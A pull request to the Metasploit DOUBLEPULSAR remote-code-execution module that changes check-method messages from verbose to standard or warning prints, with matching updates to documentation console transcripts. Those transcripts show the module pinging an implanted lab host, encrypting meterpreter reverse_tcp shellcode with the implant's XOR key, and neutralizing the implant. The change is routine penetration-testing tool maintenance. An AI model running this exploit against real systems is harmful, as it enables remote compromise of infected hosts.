### PR TITLE
Update prints in DOUBLEPULSAR exploit check method

### DIFF
--- a/documentation/modules/exploit/windows/smb/doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/smb/doublepulsar_rce.md
@@ -37,7 +37,7 @@ msf5 exploit(windows/smb/doublepulsar_rce) > check
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
+[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [+] 192.168.56.115:445 - The target is vulnerable.
 msf5 exploit(windows/smb/doublepulsar_rce) >
 ```
@@ -53,7 +53,7 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
+[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
 [*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
 [*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
@@ -86,7 +86,7 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
+[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:445 - Implant neutralization successful
 [*] Exploit completed, but no session was created.

--- a/modules/exploits/windows/smb/doublepulsar_rce.rb
+++ b/modules/exploits/windows/smb/doublepulsar_rce.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_good("Connected to #{ipc_share} with TID = #{@tree_id}")
     vprint_status("Target OS is #{smb_peer_os}")
 
-    vprint_status('Sending ping to DOUBLEPULSAR')
+    print_status('Sending ping to DOUBLEPULSAR')
     code, signature1, signature2 = do_smb_doublepulsar_pkt
     msg = 'Host is likely INFECTED with DoublePulsar!'
 
@@ -145,13 +145,13 @@ class MetasploitModule < Msf::Exploit::Remote
           'x64 (64-bit)'
         end
 
-      vprint_good("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")
+      print_warning("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")
       CheckCode::Vulnerable
     when :not_detected
-      vprint_error('DOUBLEPULSAR not detected or disabled')
+      print_error('DOUBLEPULSAR not detected or disabled')
       CheckCode::Safe
     else
-      vprint_error('An unknown error occurred')
+      print_error('An unknown error occurred')
       CheckCode::Unknown
     end
   end


### PR DESCRIPTION
`vprint_good` should be `print_warning`, and most `vprints` should be `print`, even if in `check`, since `check` is critical functionality. This is an exception for this module, not the rule for all modules.

#12374